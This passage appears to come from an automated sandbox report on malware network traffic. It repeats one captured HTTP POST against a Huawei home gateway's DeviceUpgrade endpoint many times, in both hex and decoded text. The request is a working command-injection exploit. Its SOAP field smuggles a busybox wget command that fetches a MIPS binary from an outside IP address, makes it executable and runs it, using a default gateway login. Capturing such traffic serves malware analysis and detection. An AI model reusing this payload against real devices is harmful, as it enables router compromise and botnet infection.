3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 